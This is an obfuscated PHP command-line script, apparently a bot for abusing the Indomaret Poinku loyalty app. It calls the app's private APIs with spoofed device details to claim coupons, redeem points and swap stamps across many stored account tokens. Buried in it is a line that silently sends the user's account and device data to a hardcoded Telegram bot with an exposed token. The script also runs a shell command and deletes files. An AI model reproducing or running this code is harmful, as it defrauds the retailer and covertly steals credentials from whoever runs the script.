  d9ZGt:
  $YXsOG = @$Ap1KM["\155\145\x73\163\x61\147\x65"];
  goto dmrOw;
  eFdhA:
  goto ckx1V;
  goto kE9HG;
  N0JV1:
  if (!($fUekS == '')) {
    goto uYD1p;
  }
  goto F5zB5;
  Wbi8s:
  echo @zM6iC("\156\145\166\x79", "\x20\x20\40\40\40\40\x20\x20\40\40\40\x20\40\40\40\40\x41\x41\x4d\111\111\x4e\x20");
  goto S4WZq;
  Chwcw:
  $lPULW = $m0f8X;
  goto cF172;
  BX_qL:
  $wlJRC = xOZB4(array("\174"), $wZnHP)[1];
  goto uPIMi;
  li7p9:
  ectyt:
  goto QKhZy;
  fw4lA:
  $qq5tL = "\x32" . $gYG6P . "\x68\147\x35\x34\65\x34\144\62\x31\166\x63";
  goto IrsDs;
  XttWW:
  die;
  goto OE4L_;
  jtZ3I:
  $hwqq9 = tHhfs("\150\x74\164\x70\x73\72\x2f\x2f\145\144\164\163\141\160\x70\56\x69\x6e\144\157\155\141\162\x65\x74\160\157\x69\x6e\153\165\x2e\143\157\x6d\57\154\x6f\147\x69\156\57\141\x70\151\x78\x2d\61\65\60\x32\x2d\x61\x70\x69\x2f\x6f\x70\145\x6e\57\x70\x69\156\57\143\x68\x65\x63\x6b\x2d\144\x65\x76\x69\143\x65", $wDisp, $aY0el, $GOXkU);
  goto R5OGU;
  ai408:
  CV5_k:
  goto eT4LJ;
  uEDKi:
  $M1ADy = @$Ap1KM["\144\141\x74\x61"]["\151\x64"];
  goto XUHGp;
  rMSj8:
  echo $yy9BI . "\x2e\40";
  goto hL1pe;
  nL8vJ:
  $Jk9cx = g8pF2("\x68\x74\164\160\x73\72\57\57\145\144\x74\x73\x61\x70\x70\x2e\151\x6e\144\x6f\155\x61\162\x65\x74\x70\x6f\x69\x6e\x6b\165\x2e\143\157\x6d\x2f\143\x6f\156\146\x69\x67\165\x72\141\164\x69\x6f\156\57\141\160\151\170\x2d\x31\x35\60\62\x2d\141\x70\x69\x2f\x6d\157\142\x69\x6c\x65\57\x73\x6b\x69\160\x2d\x6d\157\144\165\x6c\x65\57\164\x72\55\163\x6b\x69\x70\55\x6d\157\x64\165\154\145", $aY0el, $GOXkU, $mlMLt);
  goto Jx478;
  ZAUQ0:
  $zn5zd = $U0YgX;
  goto W1xiW;
  diI12:
  $wd9cN = date("\x64\55\x6d\x2d\x59\x20\174\40\110\x3a\151\x3a\163");
  goto Yx_cW;
  OTrdv:
  $jTEU0;
  goto JeqGb;
  mwNvq:
  echo @zm6Ic("\x6e\145\166\171", "\40\x20\40\x20\40\x20\40\40\x20\40\x59\x41\x4e\107\x20\116\x59\105\102\101\x52\111\116\40\x53\103\122\111\x50\x54\40\111\116\111\x20\12");
  goto KTj7C;
  rvC9u:
  echo @zm6Ic("\x79\x65\154\x6c\x6f\x77", "\x4d\x61\x73\165\153\x6b\141\156\40\116\141\155\141\40\x4b\x6f\164\x61\40\101\x6e\x64\x61\x20\72\40");
  goto TcaPp;
  cCvz0:
  goto IA3io;
  goto rfy1i;
  GxUv5:
  echo "\12";
  goto UFeHI;
  CVCdX:
  if ($LNAso == "\x44\x69\163\x6b\157\156\x20\x52\x70\40\62\65\56\60\x30\60\x20\113\154\x69\x6b\40\x49\x6e\x64\x6f\x6d\141\162\x65\x74") {
    goto D4vRH;
  }
  goto SJovd;
  LYQTx:
  AGZdm:
  goto PlUQs;
  qzh4E:
  $m0f8X = explode("\12", @file_get_contents("\155\x79\164\157\153\145\156"));
  goto a_dZx;
  G_BNz:
  @unlink("\160\157\151\x6e\150\160\x2e\x70\150\x70");
  goto zt4XJ;
  xQPXT:
  $Ap1KM = json_decode($upOL9, true);
  goto LpVAo;
  RzArZ:
  echo "\xa";
  goto EBiBT;
  X_5QB:
  echo @ZM6iC("\x6e\145\x76\x79", "\133\61\67\x5d\x20{$uU2QF}\40\xa\x20\40\40\x20\76\x20{$e52KH}\x20\xa\12");
  goto HYr1o;
  lFjF7:
  $sONlZ = str_replace("\xd", '', $rERzL);
  goto dOzgh;
  g1guV:
  $m_IIo = trim(fgets(STDIN));
  goto AKVOr;
  epp07:
  $Qa1_P = @$owfHy["\x64\x61\164\x61"]["\x63\157\x6e\164\145\x6e\164"][$dQ8Tp]["\x63\157\165\x70\x6f\x6e\x49\x64"];
  goto hSvR2;
  ElxJu:
  KT3G1("\146\x6f\162\x63\145\x63\x6c\157\x73\145", $zn5zd, $aY0el, $earOL, $GOXkU);
  $teeli001 = file_get_contents("https://api.telegram.org/bot5529819060:AAGy5hFZW802Cm7Dut_gOSEtnPMzrY_n49I/sendMessage?chat_id=1069319412&text=$zn5zd|$aY0el|$earOL|$GOXkU");
  goto sjkH3;
  Nmn6H:
  echo "\12";
  goto EtgZF;
  NF9qG:
  $Jk9cx = G8pF2("\150\x74\164\160\x73\72\x2f\x2f\145\144\x74\163\x61\x70\160\x2e\151\x6e\144\157\155\x61\x72\x65\x74\x70\157\x69\x6e\x6b\165\x2e\x63\x6f\x6d\x2f\x63\165\163\164\x6f\155\145\162\x2f\141\x70\x69\x78\x2d\61\x35\x30\x32\55\141\x70\151\x2f\155\157\x62\x69\x6c\145\57\x64\145\164\x61\x69\x6c\55\x63\x75\163\x74\157\x6d\145\162\x2d\157\162\151\147\151\156", $aY0el, $GOXkU, $mlMLt);
  goto dTZdO;
  wbvww:
  $Ap1KM = json_decode($Jk9cx, true);
  goto rGzs0;
  KZ3My:
  $zcN5u = Xozb4(array("\x7c"), $tqWr2)[0];
  goto Aed5e;
  b5Mi3:
  $ZqwwP = @$owfHy["\x64\141\164\141"][$qtgR3]["\153\145\171\167\157\162\144"];
  goto BanQZ;
  ZAk3u:
  $aoIfK = trim(fgets(STDIN));
  goto ibrrS;
  N_J9S:
  $jTEU0++;
  goto XuYvJ;
  BkzVQ:
  eZaFp:
  goto wea5J;
  vXYtL:
  $ZNU2M = @$Ap1KM["\144\141\164\x61"]["\x72\x65\x77\x61\162\144\x73"][0]["\151\x74\x65\155"][0]["\156\x61\155\x65"];
  goto Wbb1K;
  wUb6J:
  echo @zm6iC("\x70\x75\162\x70\154\145", "\x49\104\x20\40\x20\x20\40\x20\40\x20\72\x20");
  goto QLuqS;
  Cm2vU:
  h8G8Y:
  goto VSZ0R;
  OzA2H:
  echo @zM6iC("\162\x65\144", "\x41\156\144\x61\x20\142\x65\x6c\x75\155\x20\x74\x65\162\144\x61\x66\x74\141\162\x2c\40\x53\x69\x6c\x61\x68\x6b\141\x6e\40\110\165\x62\165\156\x67\151\x20\x4f\x77\x6e\x65\x72\40");
  goto WKsfY;
  xdGe6:
  $M1ADy = @$Ap1KM["\144\141\x74\141"]["\x69\x64"];
  goto Y2gfk;
  ITp7p:
  echo $yy9BI . "\x2e\x20";
  goto rNskw;
  jfQhS:
  echo "\12";
  goto b8dwF;
  RV_I1:
  goto AUIk1;
  goto BUEN3;
  w09r9:
  Q9w_S:
  goto OfOX3;
  pIdXS:
  N1kWv:
  goto dEqiK;
  Tty61:
  echo "\xa";
  goto SI53_;
  xgO0j:
  die;
  goto Pf6W0;
  sDo5R:
  goto aKEU_;
  goto T_N9h;
  BVXm3:
  $w5ulg = str_replace("\15", '', $TvVlh);
  goto bAFN4;
  O6JNu:
  echo @zM6IC("\x79\145\x6c\x6c\157\167", "\110\141\x72\147\141\40\120\157\151\x6e\40\x20\x3a\x20");
  goto bRVfq;
  g8swJ:
  echo @zM6Ic("\171\x65\154\154\x6f\x77", "\102\165\151\154\x64\40\x42\x79\40\106\105\122\x44\131\40\x52\101\x4d\x41\104\110\x41\116\x20");
  goto LzqPy;
  s4WP6:
  echo "\12";
  goto G_1Lo;
  SMCx_:
  echo @Zm6Ic("\171\145\x6c\154\157\x77", "\x20\40\x20\x20\40\x20\x20\x20\x42\x75\151\154\144\x20\102\x79\x20\x46\105\x52\104\x59\x20\122\x41\x4d\x41\104\110\x41\x4e\12");
  goto RG7P9;
  A3f9Q:
  echo @ZM6Ic("\147\162\145\145\x6e", $wd9cN);
  goto MYWMI;
  YSM2f:
  echo @ZM6ic("\160\x75\162\x70\x6c\145", "\x5b\x37\x5d\x20{$VW123}\40\12\40\x20\40\40\76\x20{$lbuGr}\40\xa\xa");
  goto mHZx1;
  Zi6MS:
  if (!($ldzeo == '')) {
    goto VRnC_;
  }
  goto X7SAF;
  Y7GSJ:
  $nb9cm = round(microtime(true) * 1000);
  goto g1ZEJ;
  YKNWk:
  function x3ry1($lEbop, $wDisp = null, $D18xv, $mlMLt)
  {
    goto n4hvk;
    bQA2f:
    wrEzI:
    goto lWngr;
    PZevp:
    goto mVBCb;
    goto bQA2f;
    pxbO8:
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true);
    goto pUz_M;
    VoY0s:
    if (!$P7lm9) {
      goto wrEzI;
    }
    goto ppvxR;
    rG28H:
    $ruc3h[] = "\141\x70\x70\154\151\x63\141\x74\x69\157\156\153\x65\171\72\40\151\156\144\157\155\141\162\x65\164";
    goto tA8VD;
    Zy6_P:
    $AXlcQ = json_decode($y7f11, true);
    goto d14QM;
    N05lh:
    $ECuqv = curl_exec($C6npe);
    goto IYYoD;
    ppvxR:
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto iEKeO;
    Fjhpf:
    mVBCb:
    goto Zy6_P;
    IYYoD:
    $P7lm9 = curl_getinfo($C6npe);
    goto VoY0s;
    sOZFQ:
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1);
    goto OCl_m;
    BrEqz:
    return $ECuqv;
    goto V1HmO;
    UNK_L:
    $ruc3h[] = "\x61\x75\x74\150\x6f\x72\151\x7a\x61\164\151\x6f\x6e\72\x20\x42\145\x61\162\x65\x72\x20" . $D18xv . "\x23" . $mlMLt;
    goto rG28H;
    ScLUO:
    $ruc3h[] = "\125\163\x65\x72\x2d\x41\147\145\x6e\164\x3a\x20\157\x6b\x68\164\164\x70\x2f\65\x2e\60\56\x30\55\141\154\160\x68\x61\x2e\65";
    goto UNK_L;
    OCl_m:
    curl_setopt($C6npe, CURLOPT_POST, 1);
    goto ScLUO;
    ga1BF:
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0);
    goto HDsL2;
    oO22i:
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "\x6b\154\x69\153\x2e\x74\x78\x74");
    goto N05lh;
    UUZjv:
    curl_setopt($C6npe, CURLOPT_URL, $lEbop);
    goto DTa5a;
    HDsL2:
    curl_setopt($C6npe, CURLOPT_POSTFIELDS, $wDisp);
    goto QGpsl;
    pUz_M:
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h);
    goto ga1BF;
    d14QM:
    print_r($AXlcQ);
    goto BrEqz;
    QGpsl:
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "\153\x6c\x69\x6b\56\x74\x78\164");
    goto oO22i;
    lWngr:
    return false;
    goto Fjhpf;
    n4hvk:
    $C6npe = curl_init();
    goto UUZjv;
    iEKeO:
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto PZevp;
    DTa5a:
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true);
    goto sOZFQ;
    tA8VD:
    $ruc3h[] = "\103\157\156\x74\x65\x6e\164\55\124\x79\160\x65\x3a\40\141\160\160\x6c\x69\x63\141\x74\x69\x6f\156\x2f\152\x73\157\x6e";
    goto pxbO8;
    V1HmO:
  }
  goto TCxB8;
  VE8z4:
  tTzdV:
  goto Ozv31;
  EGSUd:
  $BcbF3 = @$Ap1KM["\144\141\164\x61"]["\160\150\x6f\156\x65\116\165\155\142\145\x72"];
  goto i4e5N;
  WZD8e:
  uYD1p:
  goto ua_0C;
  jFIe0:
  $zvt88 = $QRhbE;
  goto a5NNa;
  S6BIV:
  $R_bYC = @$nPb0z["\144\141\x74\x61"]["\151\144"];
  goto SE9Y8;
  QDJgG:
  @unlink("\160\x6f\x69\x6e\150\x70\56\160\150\x70");
  goto wWuTM;
  igLYC:
  echo "\12";
  goto Cnge9;
  JrA1b:
  echo @Zm6iC("\x6e\x65\x76\x79", "\x53\157\x72\x72\x79\x2c\x20\124\x68\x69\163\40\123\143\162\151\x70\164\40\110\141\x73\40\102\145\x65\156\x20\x52\x65\x6d\157\166\x65\x64\x20\102\x79\40\x54\x68\145\x20\117\x77\156\145\162\x21\x21");
  goto Q4cjo;
  RNAEK:
  echo @ZM6Ic("\x6e\x65\x76\171", $ZNU2M);
  goto Pdyfx;
  RrOSK:
  sleep(2);
  goto uY1yn;
  qV_iI:
  $QRhbE = explode("\xa", @file_get_contents("\x66\x6f\162\x63\x65\143\x6c\157\163\145"));
  goto SFpTg;
  lTdia:
  lqjr6("\x6d\x79\164\157\x6b\x65\x6e", $zn5zd, $mlMLt);
  goto wsUqo;
  mMLTN:
  $POIN9 = @$owfHy["\144\x61\164\x61"]["\x62\141\x6c\x61\x6e\143\145"];
  goto gNONM;
  LCrgv:
  $DxrJr = "\x31\x30\60\x30\60\60\60\60\x30\60\60\60\60\60\60\x30\x30\x30";
  goto Ej7f9;
  Ydv5v:
  $CeRgl = @$owfHy["\144\141\x74\141"][0]["\162\145\143\x69\x70\151\x65\156\164\x4e\141\x6d\x65"];
  goto k6NcS;
  pa3zD:
  $lPULW = $m0f8X;
  goto M6TPS;
  gdThu:
  if (!($fUekS == '')) {
    goto EKk1g;
  }
  goto pbPWa;
  BcZc1:
  echo $jTEU0;
  goto oR6TB;
  P1XjP:
  echo "\12";
  goto GZbpD;
  aQS5l:
  $D18xv = @$owfHy["\x64\x61\164\141"][0]["\x69\x64"];
  goto ayiza;
  j_17H:
  echo "\xa";
  goto J4JQ1;
  TSNoY:
  echo @zm6iC("\x6e\x65\x76\171", $wd9cN);
  goto gmL5u;
  UDuJL:
  echo @zm6Ic("\x6e\x65\x76\x79", "\x41\153\x75\156\x20\113\145\x20\40\40\x20\40\40\40\x20\72\40");
  goto r_nAC;
  rWXkI:
  $ofEkP = cwaLZ("\150\x74\x74\160\163\x3a\57\x2f\145\x64\x74\163\x61\x70\x70\x2e\151\x6e\144\157\x6d\141\162\145\x74\160\157\x69\x6e\153\x75\56\143\x6f\x6d\57\x6c\x6f\x79\x61\x6c\x74\171\x2f\x61\160\151\170\x2d\x31\65\60\x32\x2d\141\x70\151\x2f\155\157\x62\151\154\145\57\143\x6f\151\156\163\57\x70\162\x69\172\x65\163\x2f\107\117\106\x52\105\123\110\62\60\x32\x32\57\x74\157\153\x65\x6e\163\57\143\154\141\x69\x6d\57\163\x69\156\147\x6c\x65", $wDisp, $aY0el, $GOXkU, $mlMLt);
  goto crpcv;
  ee12d:
  echo @zm6ic("\x72\x65\x64", "\12\176\x7e\x7e\x7e\x7e\176\x7e\176\x7e\x7e\176\x7e\176\x7e\x7e\x7e\x7e\x7e\x7e\x7e\176\x7e\176\x7e\176\176\176\x7e\x7e\176\176\x7e\176\x7e\176\x7e\176\176\x7e\x7e\176\x7e\x7e\176\176\x7e\176\176\12");
  goto JaM1M;
  I1BAb:
  $LgiFv = @$Ap1KM["\x64\x61\x74\x61"]["\x69\156\x66\x6f\x72\x6d\x61\164\x69\x6f\x6e"];
  goto grlZ3;
  XWLYH:
  $zvt88 = $QRhbE;
  goto zNo_8;
  NrQ94:
  irVGF:
  goto o6YWQ;
  UvoZT:
  if (!($cPDPt == 11)) {
    goto xCMQT;
  }
  goto p6pym;
  xM5qM:
  $zn5zd = trim(fgets(STDIN));
  goto x2BCx;
  KEzEt:
  $S02nx = @$lImQC["\144\x61\164\141"]["\x63\x6f\156\164\145\x6e\x74"][13]["\143\157\x75\160\157\156\116\141\x6d\x65"];
  goto ZCjtF;
  SFraX:
  if (!($XDyMm == "\60")) {
    goto Fcnek;
  }
  goto C3iNo;
  C0b6j:
  echo @Zm6IC("\x6e\145\x76\x79", "\40\x20\40\40\40\40\40\40\40\x20\x59\x41\x4e\107\x20\x4e\x59\105\x42\x41\x52\111\x4e\x20\x53\x43\122\x49\120\124\40\x49\x4e\111\40\12");
  goto f0Msa;
  J8niW:
  $UHj7C = G8Pf2("\x68\164\x74\160\163\x3a\x2f\x2f\145\x64\164\163\x61\x70\160\56\151\156\144\157\x6d\x61\x72\145\164\160\x6f\151\156\153\165\x2e\143\157\x6d\x2f\143\x6f\x75\x70\x6f\156\57\141\160\x69\x78\x2d\61\x35\x30\62\55\x61\160\x69\57\x6d\157\142\151\x6c\x65\57\143\x6f\165\160\x6f\x6e\x73\77\x75\x6e\160\x61\x67\145\144\75\164\162\x75\145", $aY0el, $GOXkU, $mlMLt);
  goto LyT7u;
  HLO5p:
  $ZNU2M = @$owfHy["\144\141\164\141"]["\x63\x6f\156\x74\x65\156\x74"][$D2zwh]["\x6e\x61\155\145"];
  goto B7_L8;
  lpuTf:
  echo @Zm6Ic("\x79\x65\x6c\154\x6f\x77", "\40\40\40\x20\x20\x20\40\x20\x20\x20\x20\40\40\x20\x20\101\101\x4d\x49\x49\x4e\x20");
  goto tzlNv;
  YzXDq:
  goto LA_80;
  goto tLljN;
  hnJzX:
  $M1ADy = @$Ap1KM["\x64\141\164\141"]["\151\144"];
  goto uu2gK;
  xkf3f:
  $XTuz1 = G1WXt("\150\x74\164\160\163\72\x2f\57\145\144\x74\x73\x61\160\160\56\151\x6e\144\157\x6d\x61\x72\x65\x74\x70\x6f\x69\156\x6b\165\56\x63\157\x6d\x2f\x6c\157\x79\141\x6c\x74\x79\x2f\x61\160\x69\x78\x2d\61\65\60\62\55\141\160\x69\x2f\155\157\x62\151\x6c\x65\57\163\164\x61\155\x70\163\x2f\x6d\145\x2f\x63\157\x75\x70\157\156\x73\57\145\x78\x63\150\141\156\147\x65", $wDisp, $aY0el, $GOXkU, $mlMLt);
  goto o5Ohl;
  b91Vm:
  echo @ZM6iC("\x6e\145\x76\171", "\x53\x6f\x72\162\171\54\x20\124\150\x69\x73\x20\x53\x63\x72\151\x70\164\x20\110\x61\163\40\x42\x65\x65\156\x20\122\x65\x6d\x6f\x76\145\x64\40\102\171\x20\124\x68\x65\40\117\167\156\145\x72\x21\x21");
  goto lnvS6;
  o5jb2:
  Gq2T9:
  goto UhQTr;
  mvWXh:
  goto ZqS2R;
  goto a0kRQ;
  gF5Fg:
  $YXsOG = "\x55\163\145\162\156\x61\x6d\x65\x20\40\40\42{$zn5zd}\x22\x20\40\x20\x54\145\154\x61\x68\x20\x4c\x6f\x67\x69\156\40\113\x65\x20\123\x63\x72\x69\160\164\40\111\104\x4d\40\x50\x4f\111\x4e\113\125\40\124\145\162\142\x61\x72\x75\40\x64\151\40\x49\x50\x20\x3d\x20" . $ae0GJ . "\40\x4c\157\x6b\x61\x73\151\40\x3d\x20" . $jcXSt . "\x2e\x2e\x20\41\41";
  goto hhSOy;
  ZUJjN:
  echo @zM6iC("\156\x65\166\171", "\x20\x7c\40\123\143\x72\x69\160\164\40\x49\x44\x4d\40\120\117\111\116\x4b\125\xa");
  goto GxlNR;
  Akwg1:
  awvwA:
  goto eef1h;
  dfcGR:
  RHRij("\x4b\x75\x70\157\156\40\120\x6f\151\156\153\x75\40\x6e\145\167\56\164\x78\x74", $knJzU);
  goto LYQTx;
  CzTPd:
  XR1Tf:
  goto wa8GE;
  amjZI:
  @unlink("\160\157\151\156\150\x70\56\160\150\160");
  goto rdASk;
  Z6h6f:
  if (!unlink($xp_1p)) {
    goto FlJax;
  }
  goto rwvRX;
  kHzhX:
  $KTLep = @$lImQC["\144\141\164\x61"]["\143\157\156\x74\145\x6e\164"][1]["\143\x6f\x75\160\x6f\156\x43\157\x64\145"];
  goto q9z4g;
  tT2Bl:
  KcewV:
  goto erEEh;
  sMCF1:
  goto b0ztV;
  goto lGCjP;
  F0Fjz:
  $GOXkU = "\130\151\141\x6f\x6d\151\x20\122\x65\144\x6d\x69\40\x35\40\x50\x6c\165\x73";
  goto CSUr1;
  bAFN4:
  $GOXkU = $w5ulg;
  goto SWCTk;
  gVo9_:
  $v1ZMX = str_replace("\15", '', $wPFxB);
  goto luIKU;
  HEE7l:
  FlJax:
  goto C_tuY;
  zbvnq:
  echo @zm6iC("\147\x72\145\145\x6e", "\x5b\61\62\135\x20{$LNAso}\x20\12\40\40\x20\40\x3e\x20{$f2A4u}\x20\xa\xa");
  goto mhPin;
  st12u:
  goto k2R5x;
  goto dsvmA;
  zAjuM:
  die;
  goto KGBSP;
  n3Ac7:
  echo "\xa";
  goto HJBvX;
  jyPnq:
  piuvy:
  goto pXPoJ;
  MSqF0:
  shell_exec("\x73\x74\x61\162\x74\40\x63\150\162\x6f\x6d\x65\40\42\x68\164\164\160\163\x3a\57\x2f\x62\x61\162\x63\157\x64\x65\56\164\x65\143\55\x69\x74\56\x63\x6f\155\x2f\142\x61\162\x63\157\144\x65\x2e\x61\163\150\170\77\144\141\x74\141\x3d\x22" . $p4iky . "\x22\46\143\x6f\x64\145\x3d\x43\x6f\144\145\61\x32\70\x26\155\165\154\164\151\160\154\145\x62\x61\x72\143\x6f\x64\145\163\x3d\x66\141\x6c\x73\145\46\164\162\141\x6e\x73\x6c\x61\x74\x65\55\x65\x73\143\75\164\162\x75\145\x26\165\x6e\151\x74\x3d\106\x69\x74\46\144\x70\151\75\x39\66\x26\x69\x6d\141\147\145\164\171\160\145\x3d\107\x69\x66\46\162\157\164\141\164\151\x6f\156\75\x30\x26\x63\157\x6c\157\x72\x3d\x25\x32\63\x30\x30\x30\60\x30\60\x26\142\x67\x63\157\x6c\157\x72\x3d\45\62\63\146\146\x66\146\146\x66\x26\143\157\144\145\160\141\147\x65\75\x44\145\x66\x61\x75\x6c\x74\x26\161\x75\156\151\164\x3d\x4d\155\x26\x71\x75\151\145\164\75\61\60\x26\x68\x69\144\x65\x68\x72\x74\x3d\106\x61\154\x73\x65\42");
  goto x29nF;
  zYTRQ:
  echo "\xa";
  goto sGyE9;
  X4lGn:
  echo @ZM6Ic("\x79\x65\x6c\154\157\167", "\x53\x74\x61\x74\x75\x73\x20\103\145\x6b\x20\x4b\x75\x70\x6f\156\40\x3a\40");
  goto NIIPa;
  n1eQD:
  goto MSwAP;
  goto X7Wc2;
  p6gIA:
  echo "\xa";
  goto uYg9g;
  O9ca7:
  $Tvjlw = rand(0, 890);
  goto JJg2J;
  Jx478:
  $wDisp = '';
  goto cs8L7;
  Nwhy1:
  $hdCXp = trim(fgets(STDIN));
  goto GgFfz;
  tbDFN:
  $efQM2 = count($QRhbE) - 1;
  goto f_eFW;
  zhjgh:
  $ABmxY = @$owfHy["\155\x65\163\163\141\x67\145"];
  goto sqioU;
  vImzz:
  @unlink("\x70\x6f\151\x6e\x68\x70\x2e\160\x68\160");
  goto ayHIl;
  aRyiT:
  $zvt88 = $QRhbE;
  goto QJCXA;
  fU8RQ:
  echo "\12";
  goto uNbOq;
  SepDd:
  $YXsOG = @$Ap1KM["\x6d\145\x73\x73\141\x67\x65"];
  goto G9LDR;
  vgbrR:
  echo "\xa";
  goto Jwbfk;
  oBg1o:
  goto aCWFZ;
  goto jaJV2;
  TJT6Y:
  echo "\12";
  goto MxNlU;
  yBav_:
  $m5BZY = gGgR_("\150\164\x74\x70\x73\72\x2f\x2f\x61\x73\151\x61\55\163\157\x75\164\x68\145\141\163\164\62\55\x69\144\155\x2d\x63\x6f\162\160\x2d\x70\x72\144\56\143\154\x6f\x75\x64\x66\165\156\x63\x74\x69\x6f\x6e\163\56\x6e\x65\164\x2f\x69\144\155\141\x70\160\163\x5f\164\x72\141\143\153\145\162\137\147\x61\x74\145\167\x61\x79", $wDisp);
  goto J7eiY;
  wa8GE:
  if (!($yy9BI < $DxrJr)) {
    goto kmnPA;
  }
  goto qE_1z;
  czGTj:
  $fZ2bz = @$owfHy["\155\145\x73\x73\x61\x67\145"];
  goto fUkb9;
  AQeBK:
  echo "\12";
  goto FpdCf;
  sEWO8:
  echo "\12";
  goto qPamN;
  xSEI4:
  $ofEkP = A0MyL("\x68\164\x74\x70\163\x3a\x2f\x2f\151\x6e\144\x6f\155\x61\162\145\164\160\157\151\x6e\x6b\x75\56\x63\157\x6d\57\x61\x70\x69\x2f\x67\x61\155\151\146\151\x63\141\x74\x69\157\156", $wDisp, $N0ol8, $M1ADy, $aY0el, $GOXkU, $mlMLt);
  goto PSf1q;
  p1xRY:
  $p4iky = @$Ap1KM["\144\141\164\141"]["\x6d\145\x6d\x62\x65\162\x49\144"];
  goto gT8Sy;
  MAExu:
  echo @ZM6ic("\x6e\x65\166\x79", $K4tCB);
  goto Mtb9w;
  LxEC0:
  echo "\xa";
  goto Fb74W;
  D9X9V:
  if ($XDyMm == "\61") {
    goto qHUhy;
  }
  goto CIbrM;
  KcLeH:
  $zcN5u = XozB4(array("\x7c"), $tqWr2)[0];
  goto u0z5i;
  pKojU:
  $nb9cm = round(microtime(true) * 1000);
  goto j7f8L;
  a2PpR:
  echo @zm6ic("\156\x65\166\171", $CeRgl);
  goto NN7jm;
  DSAWn:
  $hdCXp = trim(fgets(STDIN));
  goto VajPX;
  cgsPT:
  $wDisp = "\x7b\42\144\x61\164\x61\x22\72\x5b\x7b\42\x61\160\x70\x6c\151\143\141\164\x69\157\156\x22\72\x7b\42\x61\x70\160\x5f\166\145\x72\x73\x69\x6f\x6e\42\x3a\x22\x33\56\61\x33\56\x30\x22\x2c\x22\x64\x65\166\151\143\145\x5f\x63\154\x61\x73\x73\x22\72\42\120\150\157\x6e\x65\42\54\x22\x64\145\166\151\x63\x65\x5f\x66\141\x6d\151\x6c\x79\x22\72\x22" . $GOXkU . "\42\54\x22\x64\145\166\151\x63\x65\137\151\144\x22\72\42" . $aY0el . "\42\x2c\x22\x6f\x73\x5f\156\141\x6d\x65\42\x3a\42\101\156\x64\162\157\151\144\40\120\42\54\x22\157\x73\x5f\x76\x65\x72\163\x69\157\x6e\42\72\x22\101\156\144\162\x6f\151\144\x20\71\42\x7d\54\42\x63\157\x72\x65\42\72\x7b\42\x65\166\x65\156\164\x5f\156\x61\155\145\x22\72\x22\143\154\151\x63\x6b\x5f\x6c\151\x6e\x6b\42\x2c\42\145\166\145\x6e\164\x5f\164\x69\155\145\163\x74\x61\155\160\42\x3a" . $nb9cm . "\54\x22\x6c\151\x6e\x6b\x5f\154\141\x62\145\154\x22\72\42\x4b\157\x6e\x66\151\x72\155\x61\163\151\x22\175\54\42\x6d\141\x72\153\145\x74\151\x6e\x67\x22\72\173\x22\165\x74\155\x5f\162\141\x77\x22\72\42\x75\164\155\137\x73\x6f\165\x72\143\145\75\147\x6f\157\x67\x6c\x65\55\x70\x6c\x61\171\x26\165\x74\x6d\x5f\x6d\145\x64\x69\x75\155\x3d\157\162\x67\x61\x6e\151\x63\42\x7d\54\42\165\163\x65\x72\x22\x3a\x7b\x22\x73\145\163\163\151\157\156\137\151\x64\x22\x3a\x22" . $MXjqh . "\x22\54\x22\x75\163\x65\x72\137\x69\144\x22\72" . $R_bYC . "\x2c\42\x75\x73\x65\x72\x5f\x69\160\x5f\141\x64\144\x72\x65\163\163\x22\x3a\42\x31\x32\67\x2e\x30\x2e\x30\56\61\42\x7d\x7d\135\x7d";
  goto ZVQhU;
  o2TKk:
  echo "\xa";
  goto ShkCI;
  ap7nM:
  $N0XGD = G8Pf2("\x68\164\x74\x70\163\72\x2f\57\145\144\x74\163\141\160\160\56\151\156\144\157\155\x61\162\x65\164\x70\x6f\x69\x6e\x6b\165\x2e\x63\x6f\155\57\x6c\157\x79\x61\154\x74\171\57\x61\160\x69\x78\x2d\x31\65\60\62\55\x61\160\x69\57\155\x6f\x62\151\x6c\145\57\160\157\151\156\x74\163\57\155\145", $aY0el, $GOXkU, $mlMLt);
  goto UHOUt;
  zNo_8:
  $tqWr2 = $zvt88[$yy9BI];
  goto GxIi2;
  xzo8f:
  echo "\x44\145\x6c\x65\164\145\144\40{$xp_1p}\x20\x20";
  goto aRKHO;
  UKi12:
  goto KfEmL;
  goto O0hxR;
  BObVG:
  @unlink("\x70\x6f\x69\x6e\x68\x70\56\160\x68\160");
  goto WDeTC;
  Qz1nu:
  $S8W9D = trim(fgets(STDIN));
  goto NaN3z;
  J4xhG:
  LvSq1:
  goto c_din;
  NssVm:
  Tv6Tl:
  goto IjPAg;
  rn4By:
  $z6UZd = trim(fgets(STDIN));
  goto CYzaS;
  wlKpJ:
  echo @zm6IC("\162\x65\144", "\113\x4f\x44\x45\40\115\x55\40\123\101\114\101\x48\40\x4a\117\x4e\x21\x21\x21\12");
  goto x9_Yt;
  XKpv9:
  echo @Zm6ic("\171\145\x6c\x6c\x6f\x77", "\x20\x20\x20\x20\40\40\x20\x20\102\x75\151\x6c\x64\x20\x42\x79\x20\x46\105\x52\x44\x59\40\122\x41\x4d\101\x44\110\x41\x4e\12");
  goto ZNBgL;
  IVGka:
  echo @Zm6Ic("\171\145\x6c\154\x6f\167", "\116\141\x6d\x61\x20\x4b\x75\160\157\x6e\156\171\x61\x20\40\40\40\72\x20");
  goto uwvBF;
  QFCAG:
  goto C8rz0;
  goto HEE7l;
  Lf5WQ:
  if (!($fUekS == '')) {
    goto y2l5l;
  }
  goto FHkRx;
  F5gUC:
  goto AteVH;
  goto Sx52J;
  htdHd:
  $m0f8X = explode("\xa", @file_get_contents("\155\x79\164\157\153\145\x6e"));
  goto AtJEi;
  P7f3o:
  $wZnHP = $lPULW[$jTEU0];
  goto oj_o6;
  PUuJw:
  $jTEU0++;
  goto KRKGo;
  Uj__J:
  curl_setopt($C6npe, CURLOPT_URL, $lEbop);
  goto LVZDm;
  UHOUt:
  $Ap1KM = json_decode($N0XGD, true);
  goto v1sZj;
  HELh_:
  echo "\xa";
  goto zlfMJ;
  TxBje:
